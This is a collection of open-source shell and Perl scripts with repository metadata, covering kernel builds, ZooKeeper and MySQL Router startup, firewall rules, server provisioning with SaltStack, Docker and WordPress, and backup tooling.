echo \#PBS -l walltime=${jobLength} >> RUN/${scriptName}.sh
echo \#PBS -o OUT/${scriptName}/ >> RUN/${scriptName}.sh
echo \#PBS -e ERR/${scriptName}/ >> RUN/${scriptName}.sh
echo \#PBS -J 1-${sampleNumber} >> RUN/${scriptName}.sh
echo module load ${moduleSAMTools} >> RUN/${scriptName}.sh
echo module load ${moduleFeatureCounts} >> RUN/${scriptName}.sh
echo sampleNames=\(${sampleNames[*]}\) >> RUN/${scriptName}.sh
echo samtools sort -n ${myDir}/../output/\${sampleNames[\$PBS_ARRAY_INDEX - 1]}/\${sampleNames[\$PBS_ARRAY_INDEX - 1]}.markdup.bam ${myDir}/../tmp/\${sampleNames[\$PBS_ARRAY_INDEX - 1]}.sorted.markdup >> RUN/${scriptName}.sh
echo cd ${myDir}/../tmp \&\& featureCounts -O -p -F GTF -t exon -g gene_id -a ${myDir}/../resources/${refGTF} -o ${myDir}/../output/\${sampleNames[\$PBS_ARRAY_INDEX - 1]}/featurecount/\${sampleNames[\$PBS_ARRAY_INDEX - 1]}.markdup.featurecount ${myDir}/../tmp/\${sampleNames[\$PBS_ARRAY_INDEX - 1]}.sorted.markdup.bam >> RUN/${scriptName}.sh
echo samtools sort -n ${myDir}/../output/\${sampleNames[\$PBS_ARRAY_INDEX - 1]}/\${sampleNames[\$PBS_ARRAY_INDEX - 1]}.rmdup.bam ${myDir}/../tmp/\${sampleNames[\$PBS_ARRAY_INDEX - 1]}.sorted.rmdup >> RUN/${scriptName}.sh
echo cd ${myDir}/../tmp \&\& featureCounts -O -p -F GTF -t exon -g gene_id -a ${myDir}/../resources/${refGTF} -o ${myDir}/../output/\${sampleNames[\$PBS_ARRAY_INDEX - 1]}/featurecount/\${sampleNames[\$PBS_ARRAY_INDEX - 1]}.rmdup.featurecount ${myDir}/../tmp/\${sampleNames[\$PBS_ARRAY_INDEX - 1]}.sorted.rmdup.bam >> RUN/${scriptName}.sh
chmod u+x RUN/${scriptName}.sh
qsub RUN/${scriptName}.sh
| true |
c336c51b91df351e54fef5db4bbda17ff4d818fc | Shell | misham/stable-kernel | /build_kernel.sh | UTF-8 | 2,785 | 3.296875 | 3 | [] | no_license | #!/bin/bash -e
unset KERNEL_REL
unset KERNEL_PATCH
unset RC_KERNEL
unset RC_PATCH
unset BUILD
unset CC
unset GIT_MODE
unset NO_DEVTMPS
unset FTP_KERNEL
ARCH=$(uname -m)
DIR=$PWD
CORES=1
if test "-$ARCH-" = "-x86_64-" || test "-$ARCH-" = "-i686-" ; then
CORES=$(cat /proc/cpuinfo | grep processor | wc -l)
let CORES=$CORES+1
fi
if [ ! -e ${DIR}/deploy ] ; then
mkdir -p ${DIR}/deploy
fi
rm -rf ${DIR}/deploy/*
function make_zImage {
cd ${DIR}/KERNEL/
echo "make -j${CORES} ARCH=arm CROSS_COMPILE=${CC} CONFIG_DEBUG_SECTION_MISMATCH=y zImage"
time make -j${CORES} ARCH=arm CROSS_COMPILE=${CC} CONFIG_DEBUG_SECTION_MISMATCH=y zImage
KERNEL_UTS=$(cat ${DIR}/KERNEL/include/generated/utsrelease.h | awk '{print $3}' | sed 's/\"//g' )
cp arch/arm/boot/zImage ${DIR}/deploy/${KERNEL_UTS}.zImage
cd ${DIR}
}
function make_modules {
cd ${DIR}/KERNEL/
time make -j${CORES} ARCH=arm CROSS_COMPILE=${CC} CONFIG_DEBUG_SECTION_MISMATCH=y modules
echo ""
echo "Building Module Archive"
echo ""
rm -rf ${DIR}/deploy/mod &> /dev/null || true
mkdir -p ${DIR}/deploy/mod
make ARCH=arm CROSS_COMPILE=${CC} modules_install INSTALL_MOD_PATH=${DIR}/deploy/mod
echo "Building ${KERNEL_UTS}-modules.tar.gz"
cd ${DIR}/deploy/mod
tar czf ../${KERNEL_UTS}-modules.tar.gz *
cd ${DIR}
}
function make_headers {
cd ${DIR}/KERNEL/
echo ""
echo "Building Header Archive"
echo ""
rm -rf ${DIR}/deploy/headers &> /dev/null || true
mkdir -p ${DIR}/deploy/headers/usr
make ARCH=arm CROSS_COMPILE=${CC} headers_install INSTALL_HDR_PATH=${DIR}/deploy/headers/usr
cd ${DIR}/deploy/headers
echo "Building ${KERNEL_UTS}-headers.tar.gz"
tar czf ../${KERNEL_UTS}-headers.tar.gz *
cd ${DIR}
}
function make_deb {
cd ${DIR}/KERNEL/
echo "make -j${CORES} ARCH=arm KBUILD_DEBARCH=armel CROSS_COMPILE=\"${CC}\" KDEB_PKGVERSION=${BUILDREV}${DISTRO} deb-pkg"
time fakeroot make -j${CORES} ARCH=arm KBUILD_DEBARCH=armel CROSS_COMPILE="${CC}" KDEB_PKGVERSION=${BUILDREV}${DISTRO} deb-pkg
mv ${DIR}/dl/*.deb ${DIR}/deploy/ # cause KERNEL is a symlink to dl/<linux>
cd ${DIR}
}
/bin/bash -e ${DIR}/tools/host_det.sh || { exit 1 ; }
if [ -e ${DIR}/system.sh ]; then
. system.sh
if [ "${IS_LUCID}" ] ; then
echo ""
echo "IS_LUCID setting in system.sh is Depreciated"
echo ""
fi
if [ "${NO_DEVTMPS}" ] ; then
echo ""
echo "Building for Debian Lenny & Ubuntu 9.04/9.10"
echo ""
else
echo ""
echo "Building for Debian Squeeze/Wheezy/Sid & Ubuntu 10.04/10.10/11.04/11.10"
echo ""
fi
make_zImage
make_modules
make_headers
make_deb
else
echo "Missing system.sh, please copy system.sh.sample to system.sh and edit as needed"
echo "cp system.sh.sample system.sh"
echo "gedit system.sh"
fi
| true |
877684345e559bab323bca7f42bdc05d6086a633 | Shell | ivanistheone/writing_scripts | /duplicatewords.sh | UTF-8 | 878 | 3.515625 | 4 | [] | no_license | #!/usr/bin/env perl
# Finds duplicate adjacent words.
use strict ;
my $DupCount = 0 ;
if (!@ARGV) {
print "usage: dups <file> ...\n" ;
exit ;
}
while (1) {
my $FileName = shift @ARGV ;
# Exit code = number of duplicates found.
exit $DupCount if (!$FileName) ;
open FILE, $FileName or die $!;
my $LastWord = "" ;
my $LineNum = 0 ;
while (<FILE>) {
chomp ;
$LineNum ++ ;
my @words = split (/(\W+)/) ;
foreach my $word (@words) {
# Skip spaces:
next if $word =~ /^\s*$/ ;
# Skip punctuation:
if ($word =~ /^\W+$/) {
$LastWord = "" ;
next ;
}
# Found a dup?
if ($word eq $LastWord) {
print "$FileName:$LineNum $word\n" ;
$DupCount ++ ;
}
# Mark this as the last word:
$LastWord = $word ;
}
}
close FILE ;
}
| true |
fa2e0c13ecd375efe164c598b008b5bbfb6dd138 | Shell | Midtrans/docker-kafka | /kafka/scripts/start-zookeeper.sh | UTF-8 | 1,434 | 3.765625 | 4 | [
"Apache-2.0"
] | permissive | #!/bin/bash
# Default ZK configuration:
export ZOOKEEPER_tickTime=2000
export ZOOKEEPER_initLimit=10
export ZOOKEEPER_syncLimit=5
export ZOOKEEPER_dataDir="/var/lib/zookeeper"
export ZOOKEEPER_clientPort=2181
# Keep the helper header in the config :)
echo '# http://hadoop.apache.org/zookeeper/docs/current/zookeeperAdmin.html' > /etc/alternatives/zookeeper-conf/zoo.cfg
# Source configuration from variables names -
# Any environment variable starting with "ZOOKEEPER_"
# will be written to the ZK config file, ie:
# ZOOKEEPER_tickTime=100 results in 'tickTime=100' being written to ZK Config
for VAR in `printenv`; do
NAME=${VAR%=*}
VALUE=${VAR#*=}
if [[ $NAME == "ZOOKEEPER_"* && $NAME != "ZOOKEEPER_SERVERS" && NAME != "ZOOKEEPER_MYID" ]]; then
echo "$(echo $NAME | sed 's/ZOOKEEPER_//')=$VALUE" >> /etc/alternatives/zookeeper-conf/zoo.cfg
fi
done
ZOOKEEPER_MYID=${ZOOKEEPER_MYID:-0}
echo ${ZOOKEEPER_MYID} > /etc/zookeeper/conf/myid
echo "# I am server #${ZOOKEEPER_MYID}" >> /etc/alternatives/zookeeper-conf/zoo.cfg
# Additionally, we'll provide a helper to allow users to easily define a set of ZK servers:
if [ -z ${ZOOKEEPER_SERVERS} ]; then
SERVER_ID=1
IFS=',' read -ra ADDR <<< "$ZOOKEEPER_SERVERS"
for SERVER in "${ADDR[@]}"; do
echo "server.${SERVER_ID}=${SERVER}" >> /etc/alternatives/zookeeper-conf/zoo.cfg
((SERVER_ID++))
done
fi
/usr/share/zookeeper/bin/zkServer.sh start-foreground
| true |
ac1fb9bfe6c3fe8a60c5a8dcf455de9b8a9fe5b3 | Shell | poacomovamos/poacomovamos | /vagrant-box/npm_install_packages.sh | UTF-8 | 325 | 2.828125 | 3 | [] | no_license | #!/bin/sh
if karma --version 2>/dev/null; then
echo "Karma already installed"
else
echo "Installing Karma"
npm install -g karma@canary
fi
if phantomjs --version 2>/dev/null; then
echo "PhantomJS already installed"
else
echo "Installing PhantomJS"
sudo apt-get -y install fontconfig
npm install -g phantomjs
fi | true |
78c79f7197f728106e9bb99bb743ce3806a142e0 | Shell | pabbareddy/mysqlrouterpcf | /start.sh | UTF-8 | 1,088 | 3.140625 | 3 | [] | no_license | #!/bin/bash
#!/usr/bin/env expect
set -ex
{
url=`util/jq -r '.["user-provided"][0]["credentials"]["db-url"]' <<< $VCAP_SERVICES`
user=`util/jq -r '.["user-provided"][0]["credentials"]["db-user"]' <<< $VCAP_SERVICES`
password=`util/jq -r '.["user-provided"][0]["credentials"]["db-password"]' <<< $VCAP_SERVICES`
echo " server at $url. Trying to bootstrap."
# echo -e '$MYSQL_PASSWORD\n$MYSQL_PASSWORD\n' | mysqlrouter --bootstrap "$MYSQL_USER@$MYSQL_HOST:$MYSQL_PORT" --user=mysqlrouter --account $MYSQL_USER ----account-create never --directory /tmp/mysqlrouter --force < "$PASSFILE"
unbuffer expect -c "spawn mysqlrouter --bootstrap $url--user=mysqlrouter --account=$user --account-create=never --directory /tmp/mysqlrouter --conf-base-port=8080 --conf-use-sockets
expect -nocase \"Please enter MySQL password for $user:\" {send \"$password\r\"; exp_continue; interact}"
sed -i -e 's/logging_folder=.*$/logging_folder=/' /tmp/mysqlrouter/mysqlrouter.conf
echo "Starting mysql-router."
exec "$@" --config /tmp/mysqlrouter/mysqlrouter.conf
} &> /dev/null | true |
7262b9fc53e0dd39743f5c2d253c5b9a82b839ce | Shell | sanderson042/spire-tutorials | /metrics/scripts/set-env.sh | UTF-8 | 507 | 2.96875 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
set -e
norm=$(tput sgr0) || true
bold=$(tput bold) || true
log() {
echo "${bold}$*${norm}"
}
log "Start StatsD-Graphite server"
docker-compose up -d graphite-statsd
log "Start prometheus server"
docker-compose up -d prometheus
log "Start SPIRE Server"
docker-compose up -d spire-server
log "bootstrapping SPIRE Agent..."
docker-compose exec -T spire-server /opt/spire/bin/spire-server bundle show > spire/agent/bootstrap.crt
log "Start SPIRE Agent"
docker-compose up -d spire-agent
| true |
140c68bf3e25594b88235b0f7e8be3a9e9773722 | Shell | arzamuhammad/cdsw-engine-custom-01 | /buildAndDeploy.sh | UTF-8 | 375 | 2.546875 | 3 | [
"Apache-2.0"
] | permissive | docker build -t kamir/cdsw-base-with-maven-graphviz-gnuplot-cuda .
export T=$(date +%I_%M_%S)
echo "current time is: ".$T
docker image ls
docker run -it -d --name container_$T kamir/cdsw-base-with-maven-graphviz-gnuplot
docker container ls
read -p "Container-ID to connect to : " C_ID
echo $C_ID
docker exec -i -t $C_ID /bin/bash
docker container stop $C_ID
| true |
6488ba15db11c7f29276d0f8a01731a700af87b4 | Shell | jasonrandrews/Cortex-M-semihosting | /run-m55.sh | UTF-8 | 870 | 3.390625 | 3 | [] | no_license | #!/bin/bash
SYS=Cortex-M55
# Find subdirectory under 'system' folder, which is the compiler used to generate the virtual platform.
BuildDir=$(ls -d system/$SYS/* | grep Lin)
echo $BuildDir
PLUGINS=$PVLIB_HOME/plugins/Linux64_GCC-7.3
# Verify isim_system exists, if it doesn't toss an error
[ ! -f ./$BuildDir/isim_system ] && echo Error, cant find isim_system executable file. Searched directory: ./$BuildDir && exit 0
if [ "$1" = "tarmac" ]; then
TMAC="--plugin $PLUGINS/TarmacTrace.so"
else
TMAC=""
fi
if [ "$1" = "trace" ]; then
CT="--plugin $PLUGINS/GenericTrace.so -C TRACE.GenericTrace.trace-sources=READ_ACCESS,WRITE_ACCESS"
else
CT=""
fi
if [ "$1" = "debug" ]; then
DEBUG="-S -p"
else
DEBUG=""
fi
echo "Running fast model simulation"
./$BuildDir/isim_system -a ./software/$SYS/AC6/hello.axf \
$TMAC \
$CT \
$DEBUG \
--stat
| true |
d0f6eac1d59f71f55832ec2510e4e0a158e799fc | Shell | teocci/GlassfishServer | /scripts/iptables.DISABLE_4848.rules | UTF-8 | 2,517 | 3.15625 | 3 | [
"MIT"
] | permissive | #!/bin/bash
# ATTENTION: flush/delete all existing rules
iptables -F
################################################################
# set the default policy for each of the pre-defined chains
################################################################
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD DROP
# allow establishment of connections initialised by my outgoing packets
iptables -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
# accept anything on localhost
iptables -A INPUT -i lo -j ACCEPT
################################################################
#individual ports tcp
################################################################
iptables -A INPUT -p tcp --dport 80 -j ACCEPT
iptables -A INPUT -p tcp --dport 22 -j ACCEPT
iptables -A INPUT -p tcp --dport 8080 -j ACCEPT
iptables -A INPUT -p tcp --dport 8181 -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -j ACCEPT
#uncomment next line to enable AdminGUI on port 4848:
#iptables -A INPUT -p tcp --dport 4848 -j ACCEPT
################################################################
#slow down the amount of ssh connections by the same ip address:
#wait 60 seconds if 3 times failed to connect
################################################################
iptables -I INPUT -p tcp -i eth0 --dport 22 -m state --state NEW -m recent --name sshprobe --set -j ACCEPT
iptables -I INPUT -p tcp -i eth0 --dport 22 -m state --state NEW -m recent --name sshprobe --update --seconds 60 --hitcount 3 --rttl -j DROP
#drop everything else
iptables -A INPUT -j DROP
################################################################
#Redirection Rules
################################################################
#1. redirection rules (allowing forwarding from localhost)
iptables -t nat -A OUTPUT -o lo -p tcp --dport 80 -j REDIRECT --to-port 8080
iptables -t nat -A OUTPUT -o lo -p tcp --dport 443 -j REDIRECT --to-port 8181
#2. redirection http
iptables -t nat -A PREROUTING -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 8080
#3. redirection https
iptables -t nat -A PREROUTING -p tcp -m tcp --dport 443 -j REDIRECT --to-ports 8181
################################################################
#save the rules somewhere and make sure
#our rules get loaded if the ubuntu server is restarted
################################################################
iptables-save > /etc/my-iptables.rules
iptables-restore < /etc/my-iptables.rules
#List Rules to see what we have now
iptables -L | true |
329438dad2ae218107ce8e773ee590e631e7c1b9 | Shell | jdavancens/aws-blender-render | /seq_to_video.sh | UTF-8 | 213 | 2.53125 | 3 | [] | no_license | #!/bin/bash
input=/home/ubuntu/output/frames/$1/%03d.png
output=/home/ubuntu/output/video/$1.mp4
echo Image sequence location: $input
echo Output video location: $output
ffmpeg -loglevel verbose -i $input $output
| true |
c62dd1cf05f79b7c0e89fcc92843a88cbf80dca3 | Shell | RobinMeles/eindopdracht | /finalscript.sh | UTF-8 | 4,778 | 3.078125 | 3 | [] | no_license | #!/bin/sh
#Auteur: Robin Meles (studentnummer 283873)
#Datum: 11 juli 2018
#--SALT-MASTER--
apt-get update
apt-get upgrade -y
wget -O - https://repo.saltstack.com/apt/ubuntu/16.04/amd64/latest/SALTSTACK-GPG-KEY.pub | sudo apt-key add -
echo deb http://repo.saltstack.com/apt/ubuntu/16.04/amd64/latest xenial main >> /etc/apt/sources.list.d/saltstack.list
sudo apt-get update
sudo apt-get install salt-master -y
sudo systemctl restart salt-master
sudo sed -i 's/#interface 0.0.0.0/interface 10.0.0.4/' /etc/salt/master
salt-key -A
salt-master
#---CACTI---
#Installeren van cacti op monitor/master
apt-get update
apt-get upgrade -y
apt-get install snmpd -y
apt-get install snmp -y
apt-get install mysql-server -y
apt-get install apache2 -y
apt-get install libapache2-mod-php5 -y
apt-get install php5-mysql -y
apt-get install php5-cli -y
apt-get install php5-snmp -y
apt-get install cacti -y
#Installervan snmp/snmpd voor cacti op minion
salt 'Ubu1604-Minion' cmd.run 'apt-get install snmp -y'
salt 'Ubu1604-Minion' cmd.run 'apt-get install snmpd -y'
#---SYSLOG-NG MASTER---
sudo apt-get install syslog-ng -y
sudo mv /etc/syslog-ng/syslog-ng.conf /etc/syslog-ng/syslog-ng.conf.BAK
cat << EOF >> /etc/syslog-ng/syslog-ng.conf
@version: 3.5
@include "scl.conf"
@include "scl-root/system/tty10.conf"
options {
time-reap(30);
mark-freq(10);
keep-hostname(yes);
};
source s_local { system(); internal(); };
source s_network {
syslog(transport(tcp) port(514));
};
destination d_local {
file("/var/log/syslog-ng/messages_${HOST}"); };
destination d_logs {
file(
"/var/log/syslog-ng/logs.txt"
owner("root")
group("root")
perm(0777)
); };
log { source(s_local); source(s_network); destination(d_logs); };
EOF
sudo mkdir /var/log/syslog-ng
sudo touch /var/log/syslog-ng/logs.txt
sudo systemctl start syslog-ng
sudo systemctl enable syslog-ng
#---SYSLOG-NG MINION---
salt 'Ubu1604-Minion' cmd.run 'sudo apt-get install syslog-ng -y'
salt 'Ubu1604-Minion' cmd.run 'sudo mv /etc/syslog-ng/syslog-ng.conf /etc/syslog-ng/syslog-ng.conf.BAK'
salt 'Ubu1604-Minion' cmd.run 'cat << EOF >> /etc/syslog-ng/syslog-ng.conf
@version: 3.5
@include "scl.conf"
@include "scl-root/system/tty10.conf"
source s_local { system(); internal(); };
destination d_syslog_tcp {
syslog("10.0.0.4" transport("tcp") port(514)); };
log { source(s_local);destination(d_syslog_tcp); };
EOF'
salt 'Ubu1604-Minion' cmd.run 'sudo systemctl start syslog-ng'
salt 'Ubu1604-Minion' cmd.run 'sudo systemctl enable syslog-ng'
#---DOCKER---
#Installation of docker according to https://docs.docker.com/install/linux/docker-ce/ubuntu/#install-docker-ce-1
sudo apt-get update
#Install packages to allow apt to use a repository over HTTPS
sudo apt-get install \
apt-transport-https \
ca-certificates \
curl \
software-properties-common
#Add Docker’s official GPG key
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
# Verify key matches fingerprint: 9DC8 5822 9FC7 DD38 854A E2D8 8D81 803C 0EBF CD88
#apt-key fingerprint 0EBFCD88
#Setting up the stable repository.
sudo add-apt-repository \
"deb [arch=amd64] https://download.docker.com/linux/ubuntu \
$(lsb_release -cs) \
stable"
sudo apt-get update
#Installing Docker CE
sudo apt-get install docker-ce -y
#Verifying that Docker CE is installed correctly by running the hello-world image
sudo docker run hello-world
#---WORDPRESS---
#Installing Wordpress according to https://www.techrepublic.com/article/how-to-install-wordpress-on-ubuntu-16-04/
wget -c http://wordpress.org/latest.tar.gz
tar -xzvf latest.tar.gz
#move the entire wordpress folder to /var/www/html to make sure other services can be hosted
sudo rsync -av wordpress/* /var/www/html/
#Giving permissions
sudo chown -R www-data:www-data /var/www/html/
sudo chmod -R 755 /var/www/html/
#Restarting apache and mysql
sudo systemctl restart apache2.service
sudo systemctl restart mysql.service
#---WORDPRESS MINION---
#Installing Wordpress on the minion according to the same installation guide
salt 'Ubu1604-Minion' cmd.run 'wget -c http://wordpress.org/latest.tar.gz'
salt 'Ubu1604-Minion' cmd.run 'tar -xzvf latest.tar.gz'
salt 'Ubu1604-Minion' cmd.run 'sudo rsync -av wordpress/* /var/www/html/'
salt 'Ubu1604-Minion' cmd.run 'sudo chown -R www-data:www-data /var/www/html/'
salt 'Ubu1604-Minion' cmd.run 'sudo chmod -R 755 /var/www/html/'
salt 'Ubu1604-Minion' cmd.run 'sudo systemctl restart apache2.service'
salt 'Ubu1604-Minion' cmd.run 'sudo systemctl restart mysql.service'
| true |
eec162ba860d99b0aa64733a307ce5b9fd8ab8d4 | Shell | tprk77/ergodox_ez | /flash_firmware.sh | UTF-8 | 381 | 3.09375 | 3 | [
"MIT"
] | permissive | #!/bin/bash
# Copyright (c) 2018 Tim Perkins
set -o errexit
set -o nounset
set -o pipefail
ERGODOX_EZ_FIRMWARE="build/ergodox_ez_tprk77.hex"
if ! command -v teensy_loader_cli &>/dev/null; then
echo "Missing teensy_loader_cli! See also:"
echo "https://www.pjrc.com/teensy/loader_cli.html"
exit 1
fi
teensy_loader_cli -mmcu=atmega32u4 -v "${ERGODOX_EZ_FIRMWARE}"
exit 0
| true |
7d7a7089982ec623613d776b6ad47ae2ebc65679 | Shell | pervcity/emp-auto-template | /scripts/unrarfuncs.sh | UTF-8 | 1,520 | 4.09375 | 4 | [
"MIT"
] | permissive | #!/bin/bash
function getRarFile() {
local rarfile=$(find "${1}" -maxdepth 1 -type f -name '*.rar' | head -n 1)
echo "${rarfile}"
}
function getMp4File() {
local mp4file=$(find "${1}" -maxdepth 1 -type f -name '*.mp4' | head -n 1)
echo "${mp4file}"
}
function getVolumeFile() {
local filenameinside=$(unrar lb "${1}")
echo "${filenameinside}"
}
function extractRarFile() {
local souredir="${1}"
local targetdir="${2}"
#if no targetdir give, assume same directory
if [[ "${targetdir}" == "" ]]; then
targetdir="${1}"
fi
#does source dir actually exist?
if [ ! -d "${souredir}" ]; then
writelog "Source directory ${souredir} does not exist"
return 1
fi
#does target dir actually exist?
if [ ! -d "${targetdir}" ]; then
writelog "Taget directory ${targetdir} does not exist"
return 1
fi
local rarfile=$(getRarFile "${souredir}")
local fullpath=""
#do we have a existing rar file?
if [ -f "${rarfile}" ]; then
local targetfile=$(getVolumeFile "${rarfile}")
fullpath="${targetdir}/${targetfile}"
#only extract if file in rar file not already exists
if [ ! -f "${targetdir}/${targetfile}" ]; then
$(unrar x -inul -y "${rarfile}" "${targetdir}")
fi
else
writelog "No rar files found in '${souredir}'"
mp4file=$(getMp4File "${souredir}")
if [ -f "${mp4file}" ]; then
fullpath="${targetdir}/${mp4file}"
fi
fi
echo "${fullpath}"
}
function getFileExtension() {
local filenameOnly=$(basename "$1")
local extension="${filenameOnly##*.}"
echo "${extension}"
}
| true |
89bcb9646ed22700238ba1d2cc530207e50c630c | Shell | petronny/aur3-mirror | /obexpushd/PKGBUILD | UTF-8 | 877 | 2.6875 | 3 | [] | no_license | # Contributor: Andrea Scarpino <andrea@archlinux.org>
# Contributor: w0rm <w0rmtux@gmail.com>
pkgname=obexpushd
pkgver=0.10.1
pkgrel=1
pkgdesc="Can be used to receive files via Bluetooth/IrDA/TCP"
arch=('i686' 'x86_64')
url="http://www.gitorious.org/obexpushd"
license=('GPL2')
depends=('openobex')
makedepends=('cmake' 'pkgconfig' 'xmlto')
optdepends=('tcp_wrappers')
source=(http://www.hendrik-sattler.de/downloads/$pkgname/0.10/$pkgname-$pkgver-source.tar.gz)
md5sums=('f917b5cdf19a04134c255c311181a67a')
build() {
cd ${srcdir}
mkdir build
cd build
cmake ../${pkgname}-${pkgver}-source \
-DCMAKE_INSTALL_PREFIX=/usr \
-DCMAKE_BUILD_TYPE=Release
make || return 1
}
package() {
cd ${srcdir}/build
make DESTDIR=${pkgdir} install || return 1
install -D -m644 $pkgdir/usr/share/doc/obexpushd/LICENSE \
$pkgdir/usr/share/licenses/$pkgname/LICENSE
rm -rf $pkgdir/usr/share/doc
}
| true |
4aa672a867b50a66149ef27a40814ebcfbace1c8 | Shell | michel-zedler/reveal.js-seeder | /bootstrap.bash | UTF-8 | 384 | 3.203125 | 3 | [] | no_license | #!/usr/bin/env bash
set -e
set -x
RELEASE=3.7.0
TARGET=reveal
rm -rf $TARGET && mkdir $TARGET
wget https://github.com/hakimel/reveal.js/archive/$RELEASE.tar.gz
tar -C $TARGET -xvzf $RELEASE.tar.gz --strip-components=1
rm *.gz
rm -rf .git
rm README.md
rm bootstrap.bash
mv spawned-readme.md README.md
git init
git add .
git commit -m "New presentation based on reveal.js $RELEASE"
| true |
9bf71ca8e1d6a9cb49eac5def78a3ea4835fbc3d | Shell | greenaar/puppet-backupninja | /files/backupninja-dup | UTF-8 | 1,552 | 3.5625 | 4 | [
"Apache-2.0"
] | permissive | #!/bin/bash
# vim: set filetype=sh sw=3 sts=3 expandtab autoindent:
#
# Copyright (C) 2014 Alexey Remizov <alexey@remizov.org>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
print_usage() {
cat << EOF
Usage: backupninja-dup <config> <command> <args>
<command> and <args> are passed duplicity as is
and the remove url and password are taken
from the appropriate <config>.dup
EOF
}
dupconfig=$1; shift
command=$1; shift
conffile='/etc/backupninja.conf'
libdirectory="/usr/lib/backupninja"
. $libdirectory/tools
setfile $conffile
getconf configdirectory /etc/backup.d
dupconfigfile="$configdirectory/$dupconfig.dup"
if [ ! -f $dupconfigfile ]; then
echo "Can't find config of \`$dupconfig'"
print_usage
exit 2
fi
setfile $dupconfigfile
setsection gpg
getconf password
setsection dest
getconf desturl
getconf ftp_password
export PASSPHRASE=$password
export FTP_PASSWORD=$ftp_password
if [ "$command" = 'status' ]; then
command='collection-status'
fi
case $command in
verify|restore)
args="$desturl $@"
;;
*)
args="$@ $desturl"
;;
esac
duplicity $command $args
| true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.